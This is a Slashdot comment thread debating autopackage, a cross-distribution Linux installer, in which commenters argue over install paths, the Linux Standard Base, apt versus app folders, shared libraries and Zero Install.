This is one of my severe annoyances with stuff that is not packaged for your distro. Most people (here on Slashdot at least) spout the "./configure make make install" like that will solve everyone's problems all the time. Do you realize how few times that actually works? Frequently an interesting app that I find on Sourceforge doesn't have config information, so that when I try to run ./configure, it just throws some error that I don't understand. It's not a problem with Linux; it's a problem with the inconsistency and lack of helpfulness of the coders. Depending on what type of files are provided there are a few different ways to install things. How hard would it be to just put in a couple of comment lines in the start of the .c file or in a README to tell how to install it? I've seen that just once or twice, and it sure helps people who aren't programmers figure out what to do with those apps.

I think it's a cool idea that you can get a whole system installed easily and quickly with packages and then (supposedly) have the flexibility to install from source a few other things that you want or that you get from other sources. It would just be a lot nicer if the implimentation could follow the idea.

I'll mention again my idea of Best Utility Evar and maybe someone can tell me if this exists already. It would be an "installer" of sorts for non-package stuff. You could point it to the scripts/files for the program you want to get installed, and it will check them for configuration/compile info and build/make/install or whatever needs to be done.

Re:Some FAQ entries

[Minna+Kirai]

Hard drive space is cheap. And so is bandwidth.

No it isn't. There are people who run Linux on PDAs with 32 meg of storage. Doubling that might cost $500+

Where does everything get autopackaged to?

[Wavicle]

The biggest problem with Linux distributions is that different distributions have different ideas about where things should go: does this file go in /sbin, /usr/sbin, /usr/bin/, /usr/local/bin, or somewhere else? Where do the configuration settings go? /home/*/.config? /etc/profile?

So, does this address the problem? Most software makers would really like to be able to release ONE package for their software and know that it will end up somewhere sensible.

I know we all love to bash Microsoft, BUT, I have rarely seen an installation problem with software written for Windows.

Re:Where does everything get autopackaged to?

[Abcd1234]

Umm, that's what the Linux Standard Base is for. Blame the distro makers and packagers for not following it. After all, the LSB has been out for a *long* time...

Re:Where does everything get autopackaged to?

[evvk]

Who cares about M$? Installing software on Windows is a lot of work, having to manually leech (or *shudder* by) the software and click through dozens of dialogs. apt-get is easy, and I have seldom had any problems with it.

Which brings me to the question, why would any free software author bother with autopackage when all decent distros provide mechanisms such as apt-get? And what about non-x86 architechtures. In my view autopackage support is _wasted time_. Any self-respecting user of my software already uses Debian, something based on it or another distro with a good package collection. Why would they want to use to something less convenient? Non-free software OTOH is irrelevant.

Re:Where does everything get autopackaged to?

[mp3phish]

Because maybe your package is a small project not yet picked up by the distributions. Are you as the maintainer going to package it for debian, mandrake, redhat, and suse? Or would you rather convert your tarballs into autopackages?

I think if I were an upstart package, and nobody were packaging me for their distro, I would want to be converted to an autopackage.

Re:Where does everything get autopackaged to?

[FooBarWidget]

By default, autopackage either installs to /usr or to $HOME (depending on what the user wants). If you really want it to use another prefix, you still can. The reason we use /usr instead of /usr/local is because there are many broken distributions that don't setup paths for /usr/local correctly. And /usr is the standard for many/most distributions.

There's a mirror of the autopackage website's information here.

Re:Where does everything get autopackaged to?

[mp3phish]

"does this file go in /sbin, /usr/sbin, /usr/bin/, /usr/local/bin, or somewhere else?"

Well, if it is a tool root might need and might be needed in some sort of "recovery" console, then you put it in /sbin. If it is a tool that might be needed by users then you put it in /usr/bin. However, this all assumes these are distribtuion supplied files. 3rd party files not provided by your distributer's package management should be installed into /usr/local/bin. The distribution package managers stay out of /usr/local. It is reserved for the administrator to install programs into.

Config files is another story. But typically the program shouldn't install files into people's /home until that user uses that program (IMO) Otherwise keep the default files to be copied in /etc.

Where do the configuration settings go? /home/*/.config? /etc/profile?"

Re:Where does everything get autopackaged to?

[IamTheRealMike]

The LSB really isn't big enough for any non-trivial desktop app, and it shows no signs of growing to meet that challenge. There'll probably ahve to be a different "standard" (yeah yeah, I know) base set, one that builds on LSB but extends it.

Re:Where does everything get autopackaged to?

So, does this address the problem? Most software makers would really like to be able to release ONE package for their software and know that it will end up somewhere sensible.

Gee, did you ever considering following the link to the FA (or one of the mirrors that have been posted) where that very question turns out to be the entire freaking point?

Re:Where does everything get autopackaged to?

[k8to]

Maybe I'm being too hardline her, but it sounds like you've added a misfeature to autopackage to complement the misfeature in the distribution.

Default to /usr/local and then help distributions to support that, by default or as part of installing autopackage.

Re:Where does everything get autopackaged to?

[mp3phish]

Since /usr/local is reserved to packages not managed by the distribution, I would think it would be the correct place to install to. Would it be that hard to fix the path when autopackage is installed?

It sounds like the smaller broken distributions are what needs fixing.

Re:Where does everything get autopackaged to?

[IamTheRealMike]

If it was only small distros, maybe we could get away with that. But it's not. It's large distros like Fedora and Debian.

Pretty quickly you realise that every distro is broken in various unique ways - isn't the distro system marvellous? So it's a lot easier to just work around their various faults than wait for the day when they all get their act together (not going to happen).

Re:Where does everything get autopackaged to?

[keesh]

LSB is a redhatism. Some parts of it are utterly daft. You know that X is mandatory under LSB, right?

Re:Where does everything get autopackaged to?

[mp3phish]

Oh bummer. That sux... :(

How hard would it be to fix these distributions? Would it require a lot of cooperation on the developers or would it be as simple as updating the path variable when someone installs autopackage? Or is it a different beast altogether?

Re:Where does everything get autopackaged to?

[IamTheRealMike]

We already "fix" or rather workaround a few of the more annoying problems like the Ubuntu/Debian libpng mess, but doing deep surgery isn't our place.

Working around others cockups is just a part of writing software I'm afraid, arguably it's a part of life ;)

Long term what I'd like to see is an equivalent to freedesktop.org for distributions, where distro developers can congregate and produce standards on how things should work. That would help a lot. Often the brokenness is needless, one distro just hasn't picked up the right fix or magic script from another. Co-ordination could help a lot.

Re:Where does everything get autopackaged to?

[0racle]

As is RPM support.

Re:Where does everything get autopackaged to?

[OrangeTide]

I *constantly* have install problems with Windows. It's not Window's fault though, it's because driver installers are written by slave labor so my videocard can be $7 cheaper.

Re:Where does everything get autopackaged to?

Windows does not really have a standard installer system. Various de-facto standards (like InstallShield) just developed. Then there is Add/Remove programs, which is pretty much a joke, though useful for programs like InstallShield to hook into.

All in all, though, packages on Windows vary greatly.

Re:Where does everything get autopackaged to?

[Master+of+Transhuman]

I have almost ALWAYS seen an installation problem with Windows.

Namely that the default install is to Program Files on the C: drive.

And I don't happen to want it there. I want a lean C: drive. I want my programs on D: and my data elsewhere.

While most programs allow me to change that location on Windows, some - especially Microsoft programs - want to just ignore my wishes and dump the program on C:.

And another installation problem I have always seen is that Windows programs want to put five thousand keys in the Registry - due to programmer laziness. So when I find a program that is well-behaved, installs in its own directory, does not place keys in the registry, and can be uninstalled by simply deleting the directory, it is a pleasure. Because I control that program, not it (or Windows) me.

The Registry was the biggest stupid mistake MS made in designing the system. A massive undocumented single source of failure subject to the whims of every developer.

Fuck Windows installation methods.

Re:Where does everything get autopackaged to?

"Because maybe your package is a small project not yet picked up by the distributions." ./configure && make && make install

Doesn't seem too dificult to me.

Re:Where does everything get autopackaged to?

[MasterOfMagic]

My copy of Debian doesn't seem to have this problem:

ed@satchmo:~$ echo $PATH
/home/ed/bin:/home/ed/bin:/usr/local/bin:/u sr/bin:/bin:/usr/bin/X11:/usr/games

Am I missing something simple?

Re:Where does everything get autopackaged to?

[nofx_3]

As broken as the disto system is, it's also a major driver of innovation in linux. If there were only one distro, we would probably not have advanced package management and administration systems we have now.

-kaplanfx

Re:Where does everything get autopackaged to?

[spectre_240sx]

I completely agree with this. One thing that has always driven me crazy with linux is that I never know where software installs to after I install it. It seems like something this rudimentary should have been better thought out. Now, if autopackage can help solve this dilemma by creating a standard location for software installs, then I'm all for it. Especially if it is able to install to the system or to a home folder, which seems to be the case.

This is the type of thing that draws me to OS X, It's got all of the functionality of a *nix operating system, but things are a lot more polished. Don't get me wrong, OS X still has its problems, but for the most part it just works really well.

Re:Where does everything get autopackaged to?

[IamTheRealMike]

And what about non-x86 architechtures.

A short word about this. The right way to do this in a distributed environment IMHO is to use something like LLVM to ship binaries in a CPU architecture independent format. This has several advantages:

• LLVM images tend to be smaller than ELF images as the bytecode format is more compact than x86 code is
• The VM can produce native code without any virtual machine overhead at install time, whilst still optimising based on the CPU features available at runtime. This gives such binaries the same advantages that Gentoo users tout as being an advantage of compiling everything as all binaries are fully optimised for your CPU, but without the massive speed hit that C/C++ parsing implies.
• As new architectures are introduced there's no need to recompile packages, you can use the pre-existing ones after writing an LLVM backend
• The LLVM image format is quite good, and more easily extended than ELF. So things like relaytool become no longer necessary because we can fix it in the binary format rather than having to hack around it.

Nobody is working on integrating LLVM and autopackage right now though.

Re:Where does everything get autopackaged to?

[IamTheRealMike]

Yes. It's not just a matter of the $PATH. It's a case of menu setups, file assocations, icon paths, desktop setups, linker cache configurations etc etc. The list goes on and on. Even if you find a perfect distro that gets all this right, it doesn't matter, we have to support all distros.

Re:Where does everything get autopackaged to?

[Abcd1234]

Err, I'm not sure about that, actually. 99% of distros install their packages to /usr (right or wrong). Now, autopackages may not be "official" distro packages, but they're packages all the same, and thus it makes sense to do as the Romans do. In my experience, /usr/local has primarily been the domain of stuff installed from source (eg, my stow repository resides there)...

Re:Where does everything get autopackaged to?

[JamesTRexx]

That's why I'm such a big fan of the BSD's, especially FreeBSD. Not only does ports work great, but it also ensures that software installed through ports follows the standard set of rules of what belongs where. Both of these things give me the satisfaction that my FreeBSD install is clean and stays clean as long as it's running, no matter what I install and remove.

Re:Where does everything get autopackaged to?

[Atzanteol]

apt-get isn't a package format. What's to stop it (or emerge, etc.) from fetching an 'autopackage' package and installing it?

Re:Where does everything get autopackaged to?

[Taladar]

The VM can produce native code without any virtual machine overhead at install time, whilst still optimising based on the CPU features available at runtime. This gives such binaries the same advantages that Gentoo users tout as being an advantage of compiling everything as all binaries are fully optimised for your CPU, but without the massive speed hit that C/C++ parsing implies.

Sorry to shatter your image of the typical Gentoo user but most of us give a shit about processor optimization (except for major arches like amd64, x86,...). Most of us compile packages from source because that way we can avoid compile-time-optional dependencies like kde, gnome, mysql, ... (to name just a few a lot of packages depend on) if we want to instead of installing lots and lots of unnecessary libraries.

Re:Where does everything get autopackaged to?

[sparkz]

Ahh, if only the distro's would honour it... my speedtouchconf.sf.net project would be so much simpler. Alas, money is more important to them. Strange that they can't see that my invested time keeps them their customers, and that without my time, they would have no money. It's only a matter of time, of course.... Subsume my project, and support it yourselves, or don't CLAIM to support it when you don't. It only causes confusion.

Re:Where does everything get autopackaged to?

[node+3]

Err, I'm not sure about that, actually. 99% of distros install their packages to /usr (right or wrong).

Right (not completely correct, as there are places outside of /usr/ that packages place things, but right in the way you meant it).

Now, autopackages may not be "official" distro packages, but they're packages all the same,

Right.

and thus it makes sense to do as the Romans do.

Wrong, only the Romans get to do everything the Romans do in Rome. The idea in Debian, for example, is that all the software installed via apt is kept in order by apt. When apt no longer controls the contents of /usr/, you introduce potential problems.

It seems wrong to me that they chose /usr/ over /usr/local/ or /opt/ or whatever the LSM states.

In my experience, /usr/local has primarily been the domain of stuff installed from source (eg, my stow repository resides there)...

That's clearly because you've only used the default system package manager.

In traditional Unix (as much as there is such a thing), it's been /usr/ for the default system software, /usr/local/ for software specific to a single machine, or set of machines, and /opt/ for "third party" software.

Re:Where does everything get autopackaged to?

[ArsenneLupin]

I know we all love to bash Microsoft, BUT, I have rarely seen an installation problem with software written for Windows.

Careful there, your calendar is 4 days fast ;-)

Re:Where does everything get autopackaged to?

Well, surely you have at least filed bug reports about the problems that prevent you from using /usr/local ?

Re:Where does everything get autopackaged to?

[IamTheRealMike]

Sure, I didn't mean *all* Gentoo users were like that. But you have to admit it is a fairly commonly raised point, even if many users know it doesn't make that much of a difference.

Re:Where does everything get autopackaged to?

[IamTheRealMike]

Guys, if you really care that much (reality check: it's just a path), change the default install location in the /etc/autopackage/config file to /usr/local - it won't complain. Just don't come crying to us when random stuff breaks because your distro isn't set up right.

Re:Where does everything get autopackaged to?

[node+3]

I don't think you need to get so defensive. No way is everyone going to agree with you. But even if you do get it wrong, we're still happy to have this system at all.

That said, one nice thing about DarwinPorts and Fink (on the Mac, of course) is you can 'uninstall' them by rm -rf'ing their base directory (you're still left with some files in /etc/ and /Applications/, but nothing that'll cause you problems).

Given all the feedback you're apparently receiving on this, you should see that this is a feature people really, really want. One problem is that we have no idea how well you've engineered this system, so we can't be sure you won't overwrite files managed by apt or rpm, or that if we install gaim (for example) via AutoPackage (which presumably installs libgaim), that if via dselect, we install something that needs the distribution's version of libgaim, that there won't be problems.

In other words, it's a wildcard, and history has shown that this is the place where things tend to go wrong--if they do, we want to be sure that it won't be too difficult to recover from.

Personally, I tried it out with SuperTux, and it worked great. I installed it in ~/.local/ which avoids any of the above concerns, but for this to really take off, it needs to stay as far away from the distribution as possible.

I can imagine this would be done with a configuration file for each distribution (and program logic to cater to the quirks of each distribution--I really think this is the way to go, as there will certainly be volunteers from the main distros to help out!). It's harder for you, but makes for a more easily accepted project.

Also, if this takes off, I can imagine distributions will add support for it natively.

The only thing left for Linux would be app bundles. Then you'll have the distributions for most of the system, AutoPackage for packages that are cutting edge, or otherwise haven't quite made it into the distributions, and app bundles for the one-off app downloads.

Re:Where does everything get autopackaged to?

[k8to]

Sane defaults are important.

Providing bad defaults and allowing people to override them in a system which purports to be a usability substrate is bad planning.

Do not default to /usr, you trade away short term pain for long term brokenness.

Mirrordot

[Hachey]

it's about time there was a system to automatically put submitted links thorugh MirrorDot. This is a prime example; /.ed before 10 comments were posted. sheesh.


-----
Check out the Uncyclopedia.org :
The only wiki source for politically incorrect non-information about things like Kitten Huffing and Pong! the Movie !

Re:Mirrordot

[pro-mpd]

I think that the 10 minutes before factor is due to the premium subscribers (those who cough up dough to get stories early).

At any rate, I have a Firefox extension that puts Coralize/ Coralize in New Tab as a right click option... much like your suggestion only with nyud.net.

We need more redundancy in our efforts!

Re:Mirrordot

[Koiu+Lpoi]

You're assuming the slashdot editors read and listen to suggestions placed in comments.

Re:nextgen already here: emerge

Why is this "informative"? Next time I see a gentoo user in real life I'm going to trip him.

Way to Slashddos the server already

Anyway, time to get outside and smell the rain clouds.

Re:nextgen already here: emerge

[karmaflux]

Not everyone wants to tie themselves to a huge complex packaging system. Some of us are perfectly happy with checkinstall. Thanks anyway.

Yes, we need this!!

[rice_burners_suck]

There aren't many replies to this story yet, but I can already see it: Lots of people are going to complain, "Why the fsck do we need yet another packaging solution?!?! We already have rpm, deb, tgz, blah blah blah..."

The reason is that most of these packaging solutions, while great for developers and those who want detailed knowledge of the inner workings of their systems, simply suck when given to mortal users.

And they don't handle a number of edge cases too well... What if you want different versions of some software to coexist on the same system? What if you want ten different versions of a library? Yes, these can all be handled by current stuff... but not very well. It's bad enough that when we install software here, we actually get the rpms or whatever and then re-package them ourselves to serve our needs.

A packaging solution that actually works is desperately needed.

Re:Yes, we need this!!

I hate to say it, but...

It seems to me that {NeXT,Open,GNU}step-style apps are both good for developers, and great for mortal users. Drag an app (it's just a file) to your Applications folder, double-click it to run, drag it to the trash to delete. They also handle your "edge cases" (multiple installed versions) just fine.

They're actually quite a bit simpler for users because an app is just a file -- a first-class object in the system. You don't need a special program just to "install" and "uninstall" programs. You don't need ugly hacks like the "start menu" (Gnome or KDE's reimplementation of it). Users think an app should be a first-class object, and it's perfectly feasible, so as developers we should make that the case.

The autopackage FAQ has "what's wrong with NeXT/MacOSX style appfolders", but it seems to consist mostly of hand-waving and straw men. They don't seem to understand how NeXT/Mac apps work, e.g., w.r.t. linking.

Re:Yes, we need this!!

What if you want different versions of some software to coexist on the same system? What if you want ten different versions of a library?

You contradict yourself here. Or else, you really mean an average user (who is no developer in your terms) needs ten different versions of a lib on their machines (given they know what a lib actually is) ? Whatever, sir.

Re:Yes, we need this!!

[grumbel]

### You contradict yourself here. Or else, you really mean an average user (who is no developer in your terms) needs ten different versions of a lib on their machines (given they know what a lib actually is)?

Probally not ten versions of a library, but two versions of a programm are quite common. Its simply about keeping the old version around while playing around with the new one. Sure your grandmother might not care about that, but anybody who uses its computer for more than just very basic email and web will love the ability to switch to a new version when they want not when the manufactor or distro maker forces it on them. Remember that a lot of computer users out there are neither clueless grandmothers nor hack-everything yourself hackers, many of them are just users who want to get their work done and yet now the basics of how a computer works.

Re:Yes, we need this!!

[zCyl]

The reason is that most of these packaging solutions, while great for developers and those who want detailed knowledge of the inner workings of their systems, simply suck when given to mortal users.

Well, there's also a flip side. Having an easy 3rd-party packaging solution might also detract from the number of packages that make it into central repositories, and this would be a significant loss. The ability to manage an entire system with ease from apt is one of the significant advantages of a Linux system. If updates and security fixes for packages are detached from this central management system, then the familiar windows-style nightmare of software management is created.

Hopefully a happy medium or a productive integration will be found. Perhaps the AutoPackaging people can think of a clever way to address the issue of managing decentralized updates and security fixes.

Re:Yes, we need this!!

[Master+of+Transhuman]

According to their FAQ, you continue to use RPM for your distro fixes and security updates. Especially since they intend to integrate with such package management systems eventually.

For such fixes and updates from your packaged software, you go to the guy (or the repository) who created those fixes and update the package.

Where's the problem?

It appears to me you are extrapolating a situation that has not occurred yet and for which there is no evidence it will occur.

Just because developers do packages doesn't mean they won't submit those packages to repositories and distros.

Re:Yes, we need this!!

[zCyl]

It appears to me you are extrapolating a situation that has not occurred yet and for which there is no evidence it will occur.

Packages like Acrobat Reader, or Java, tend to be third-party distributed, and this makes them more difficult to manage productively than the rest of the system. Just the other day there was an announcement of a conflict between Mozilla and Debian, over who controls the contents of a package. What if more control-desiring upstream developers release their packages upstream? If Mozilla is released as an AutoPackage, then how do I get bug fixes and security updates of Mozilla, or a dozen other such packages? If my core of my system is apt, and I can update the core of my system with an apt-get upgrade, but then Mozilla and a dozen other of the third-party packages are through AutoPackage, then how do I update those without going out and manually downloading a few dozen AutoPackage updates?

The argument being made is that having decentralized package distribution standardizes things across distros, which yes, it can somewhat (even though it reduces standardization within distro), but then it significantly detracts from automated management of a system unless a solution can be found for this. I'm thinking of something along the lines of a massive table of apt sources, but for the AutoPackaging system to obtain updates.

Automatic update management has become essential for serious management of a system. Removing that with an alternate package management system which cannot perform this would be a critical mistake, so I hope the AutoPackaging developers take some time to consider this.

Re:Yes, we need this!!

[doc+modulo]

Mod parent up please!

Packages are much more complicated conceptually (files all over the place for example) than appfolders.
Then why use packages? I think the reasons are:
1. Efficiency of HD space and memory
2. Some things are easier to do with files all over the place.

In the end, it's millions of people who have to put up with the confusing situation of packages just so that a few very smart developers can have it easier. That's the wrong way around! Even those same developers USE the program many more times than they have to package it up.

#1 Efficiency on the HD is not THAT important anymore. Multiple copies of libraries on your HD inside different appfolders are doable. Efficiency inside RAM can probably be the same as with packages. Maybe make a big index of all the libraries that are available inside the appfolders on the system.

#2 There MUST be ways around the problems with appfolders. There are only a couple minor ones left. Programmers are supposed to be smart, persistent people. As I said, there MUST be a way around the problems.
Maybe a Daemon that keeps a lookout for everything that has to do with appfolders.

Daemon: "Oh there's a new appfolder in the /programs folder? Let's update the library index with the libraries found inside it"

I don't know exactly, but what I DO KNOW is that the end result of working out all the puzzles surrounding appfolders in the end will make life much better for millions of people. MAYBE the programmers will have to do a little extra work or be just a little bit smarter (probably not) but they ARE the smart ones in this scenario, if there's anybody who has to go through hoops it's supposed to be the programmers, not the users. Besides, programmers are mostly program users as well, they'll get the big benefits just as mortals will.

In the end you cannot talk your way out if this: PC's are supposed to be our slaves and take away work. Users should be able to work with a PC like THEY would like to work with it (appfolders, GUI etc.)

When you're saying: "PC users should learn this and that to install a program" You're basically saying we should steer the evolution of the human race (a program is a thing like this rock I can pick up) into a new direction just so they can work with PC's and packages like they are now.

The PC will improve and change very fast, it should be in the right direction. That direction is to make the PC into something an average human, evolved over millions of years, can use as easy as possible.

Re:Yes, we need this!!

[IamTheRealMike]

The autopackage FAQ has "what's wrong with NeXT/MacOSX style appfolders", but it seems to consist mostly of hand-waving and straw men. They don't seem to understand how NeXT/Mac apps work, e.g., w.r.t. linking.

Could you elaborate please? Of course it's possible to build a system that uses appfolders, NeXTStep is one, however:

• Doing that on Linux is hard, because of dependencies and the lack of a large platform. I'm not interested in theoretical systems, I'm interested in what I use which is Linux. I'm also not interested in MacOS X because I don't use that, and because it's proprietary which is totally not the way forward for our society.

• Linux isn't designed to allow appfolders easily. The freedesktop.org specs are oriented around the concept of "drop a file in this directory, update a cache". This works well for package managers, less well for appfolders. It's done that way for valid reasons: the menu system is designed with administrators, windows compatibility and internationalization in mind. The appfolders menu system isn't really designed per se, it's just a convention to put stuff in /Applications (and a shockingly large number of apps break if they aren't in /Applications).

• The issues with linking etc are well known. Yes I understand how MacOS X linking works, that includes how frameworks work and also the weak linkage Apple use. Before suggesting we don't understand linking how about reviewing things like apbuild and relaytool. Nonetheless, new libraries are manufacturered at a quite astonishing rate on Linux: the openness lends itself to massive and extremely fine grained code reuse. That means we can't just rely on having a bigass platform, though one would be nice. Dep resolution is still important simply to prevent your OS becoming totally obsolete within a year.

The only person who has really done serious work with appfolders on Linux is Thomas Leonard, an extremely smart man who was behind the ROX desktop. Note that appfolders aren't a Mac or NeXT invention, they were done by RISC OS back when I was a wee kid.

As Thomas found out, dependencies are kind of a tricky problem with appfolders. His solution was ZeroInstall, a very nice piece of work I must say. However it had issues, as software often does, and now he is designing something called the "Injector". This has quite a few concepts similar to autopackage, namely management of interfaces and dependencies. So in the process of "fixing" appfolders to have all the features people wanted, he ended up with something that vaguely resembles systems like autopackage and apt-get. Note: that doesn't mean to imply that the Injector is useless or anything, it's not and has some good ideas. I encourage people to check it out!

Just be aware that appfolders tend to evolve into installers eventually. They did on DOS, RISC OS, and of course on MacOS X as well (iTunes comes in an installer and it's not the only one ....)

Re:Yes, we need this!!

[misleb]

The autopackage FAQ has "what's wrong with NeXT/MacOSX style appfolders", but it seems to consist mostly of hand-waving and straw men. They don't seem to understand how NeXT/Mac apps work, e.g., w.r.t. linking.

The biggest argument that the FAQ made against the OS X style application on Linux is its complete inability to deal with dependencies. Most OS X apps can assume that all the needed libraries and services will be installed as part part of a standard OS installlation. Linux apps do not have this luxury. This is neither a strawman nor hand waving. How do you propose dealing with this issue? What does a user do when he/she gets "libgnome-2.8.1.so not found" after dragging their favorite application into the "Applications" folder?

-matthew

Re:Yes, we need this!!

[misleb]

Multiple copies of libraries on your HD inside different appfolders are doable. Efficiency inside RAM can probably be the same as with packages. Maybe make a big index of all the libraries that are available inside the appfolders on the system.

You have no idea how much RAM shared libraries save. Especially on your average graphical desktop. Also, multiple copies of libraries makes it very difficult to apply updates to all applications that use a particular library.

Maybe make a big index of all the libraries that are available inside the appfolders on the system.

How does this solve anything? Each application is still going to want to use its own version. And if it doesn't use its own version, dont' you run the risk of breaking one application by installing overlapping libraries included in another appfolder? Sounds like hell to troubleshoot.

-matthew

Re:Yes, we need this!!

[tal197]

As Thomas found out, dependencies are kind of a tricky problem with appfolders. His solution was ZeroInstall, a very nice piece of work I must say. However it had issues, as software often does, and now he is designing something called the "Injector". This has quite a few concepts similar to autopackage, namely management of interfaces and dependencies. So in the process of "fixing" appfolders to have all the features people wanted, he ended up with something that vaguely resembles systems like autopackage and apt-get. Note: that doesn't mean to imply that the Injector is useless or anything, it's not and has some good ideas. I encourage people to check it out!

Thanks for the plug ;-) By far the biggest problem with Zero Install is simply that it requires a virtual filesystem, and POSIX doesn't provide a way to do this, so we have a Linux-only kernel module. And Linux has a really unstable module API, so we can't ship binaries, which makes it hard to install the system in the first place. But this is not a theoretical problem with app dirs, just a limitation of Linux.

For both Zero Install and the injector, the situation I want to support is:

• Multiple users.
• Sys admin doesn't trust users with root permission.
• Users don't trust each other.
• Two users want to run the same software. This must be efficient.

Current systems make you choose either:

• Inefficient (two copies downloaded and installed), or
• Insecure (second user must trust first user to get and install a good copy).

Readers might like to see the full discussion.

Re:Yes, we need this!!

[doc+modulo]

Maybe make a big index of all the libraries that are available inside the appfolders on the system.

How does this solve anything? Each application is still going to want to use its own version. And if it doesn't use its own version, dont' you run the risk of breaking one application by installing overlapping libraries included in another appfolder? Sounds like hell to troubleshoot.

Well, let's say it's not just an index of libraries of all the programs but a central repository of libraries, exactly like the libraries are stored in the traditional UNIX package way. When the index finds that 2 or more appdirs are using the same library, it copies that dual-use library into the traditional /lib or whatever Linux uses. NOW, when by happenstance those 2 progams are loaded at the same time, they will share that library in RAM, just like the package way of doing things.

It's not very HD friendly, but you're trading in HD space for more efficient RAM usage.

Another advantage is that you can still use the appdir just like it's supposed to because it will still have it's own copy of the library in itself. So "installing" a program onto another computer by just copying the appdir is still possible. Might leave some stray library around in the central repository but the library index Daemon might give you a warning that "this library is probably just taking up HD space" after all programs using that library are gone.

By the way, when you said both:

"You have no idea how much RAM shared libraries save."

and

"Each application is still going to want to use its own version."

You contradicted yourself I think. I'm not trying to attack you but how often are libraries shared in RAM between installed-by-user programs?

Re:Yes, we need this!!

[misleb]

Well, let's say it's not just an index of libraries of all the programs but a central repository of libraries, exactly like the libraries are stored in the traditional UNIX package way. When the index finds that 2 or more appdirs are using the same library, it copies that dual-use library into the traditional /lib or whatever Linux uses. NOW, when by happenstance those 2 progams are loaded at the same time, they will share that library in RAM, just like the package way of doing things

Sounds like an awkward hack to me.

t's not very HD friendly, but you're trading in HD space for more efficient RAM usage.

Or just use the package system and get both efficent RAM usage and efficient disk usage.

"You have no idea how much RAM shared libraries save."
"Each application is still going to want to use its own version."

You contradicted yourself I think.

Not at all. One statement was referring to the current system and the other was referring to an appfolder system.

I'm not trying to attack you but how often are libraries shared in RAM between installed-by-user programs?

In a properly maintained package system, almost always. There are some cases where an application will use old 1.x gnome libraries, for example, but that is rare. Most Debian packages are going to be built against the current library set. And anything you complile is, by default, going to build against the current set of installed libraries.

Don't get me wrong. I love the OS X appfolder system. I just don't think it is right for Linux at this time.

-matthew -matthew

Re:Yes, we need this!!

I'm also not interested in MacOS X because I don't use that, and because it's proprietary which is totally not the way forward for our society.

I'm not interested in systems which require me to teach my mom about what an "installer program" is and how to use it, because things which are more complex than they need to be turn off lots of users, which is totally not the way forward for our society.

If I was writing an app installing/running system for Linux, I would be *incredibly* interested in the Mac. It has the easiest "installation" (i.e., none) of any system on the market today. To say you're not interested in it scares me. What's next -- are we getting rid of scrollbars because they started out on a proprietary system, too?

Linux isn't designed to allow appfolders easily. The freedesktop.org specs are oriented around the concept of [...]

The fd.o specs aren't set in stone. If you came to them and said you wanted to make app installation simpler, they'd probably at least listen to you. They seem like nice folks.

The appfolders menu system isn't really designed per se, it's just a convention to put stuff in /Applications

"appfolders" (as you call them) don't have a "menu system", because they don't need one. The whole point of making apps first-class objects is so you can treat them like anything else. I don't have a "menu system" to index (say) the spreadsheets with my tax information, either, yet I seem to open them just fine.

(and a shockingly large number of apps break if they aren't in /Applications).

This is obviously a bug with those particular apps, not a bug with the concept of an "application". I know lots of Mac users who keep apps on the desktop, or even in the disk image they downloaded, and I have yet to see one fail yet, so it's not exactly a doomsday scenario.

Yes I understand how MacOS X linking works, that includes how frameworks work and also the weak linkage Apple use.

If you do, the answer in the FAQ sure doesn't indicate it.

It lumps everything into "static" and "dynamic" and doesn't address Mac-style linking, which is in many ways a best-of-both-worlds solution. It also points to a "why not statically link everything?" FAQ; 2 of the 3 points made there don't apply to Mac-style linking.

So it sound like either (a) you don't understand how Macs do linking, or (b) you're sweeping all of its good attributes under the carpet because they make Autopackage's design deficiencies more apparent. Neither one is helping your credibility.

Just be aware that appfolders tend to evolve into installers eventually. They did on DOS, RISC OS, and of course on MacOS X as well (iTunes comes in an installer and it's not the only one ....)

Um ... wha?

First-class apps are not going anywhere on the Mac. They are, and have always been, the recommended way to package apps. I don't know what planet you're on, but most apps are drag-to-install.

iTunes is a rare exception, as you note, but simply because iTunes upgrades typically need Quicktime (system library) upgrades, and you yourself note that "core software" is a different class than apps. (They could have used an installer for QT, and made iTunes a download, but new QT versions are usually downloaded for iTunes, so that wouldn't help most people.)

It has nothing to do with complexity. You can drag-n-drop MS Office onto your hard disk and run it, without using any installer, and that's arguably much more complex than iTunes. The issue is *core OS software*, which Autopackage dodges, as well.

Actually, most people probably never download iTunes from the webpage. It comes with every Mac (and has for years), and gets upgraded when you do a Software Upgrade. So the difference is merely academic -- something you wished to avoid, IIRC.

Re:Yes, we need this!!

[Master+of+Transhuman]

"then how do I update those without going out and manually downloading a few dozen AutoPackage updates?"

You still miss the point. Those packages could just as easily be placed in a repository and could be downloaded all at once by an automated facility supplied by the distro.

If Mozilla and Debian are fighting over a package, that implies stupidity on the part of at least one of them. Unfortunate, but it has nothing to do with the methodology of package management.

And there is nothing preventing complete automated management of packages. The Autopackage FAQ says they intend to integrate with automated package managers.

So again I ask, where is the problem?

You haven't provided any evidence that any of this is necessarily going to be a problem.

Try it. If it becomes a problem - as dependency hell supposedly is for current methods - then come up with a new way - like Autopackage has.

Re:Yes, we need this!!

[doc+modulo]

Don't get me wrong. I love the OS X appfolder system. I just don't think it is right for Linux at this time.

Is this more a conclusion you arrive at by feeling or is it the pure logic of understanding the situation and adding up all the plusses and negatives? You have to admit, the end result from the appfolder scenario is much better for the PC user than the package scenario we have now, IF we can solve the puzzles elegantly. Better to start the Linux movement on appfolders NOW when it's still in flux than to wait until the Linux scene has been totally set in it's ways.

This /. article has made me read pages on the Zero Install site. I was already convinced that, from the end-user's perspective, appfolders are better. But on this page of their site, they make a good argument about security being better with their system, so from a system's logic point of view it is probably better as well.

Ofcourse it's THEIR site so you might find ways their arguments are faulty but I'm convinced this is the way to go over packages for most programs.

I'm not talking about the ROX desktop, only the program installation part of that system, Zero Install. Let me know what you think.

Re:Yes, we need this!!

[misleb]

Is this more a conclusion you arrive at by feeling or is it the pure logic of understanding the situation and adding up all the plusses and negatives?

It is the conclusion I come to after having used Linux for 10 years.

You have to admit, the end result from the appfolder scenario is much better for the PC user than the package scenario we have now,

As a Debian user, I must say that the package system is treating me pretty well.

Better to start the Linux movement on appfolders NOW when it's still in flux than to wait until the Linux scene has been totally set in it's ways.

I can't say that it is the right way to go. I think the Linux scene still needs to settle before we can seriously talk about making universal packages and/or appfolders. I really don't want MY system running 5 different versions of a basic shared library just because the software author couldn't count on a certain version being on the user's system.

Ofcourse it's THEIR site so you might find ways their arguments are faulty but I'm convinced this is the way to go over packages for most programs.

I'm not talking about the ROX desktop, only the program installation part of that system, Zero Install. Let me know what you think.

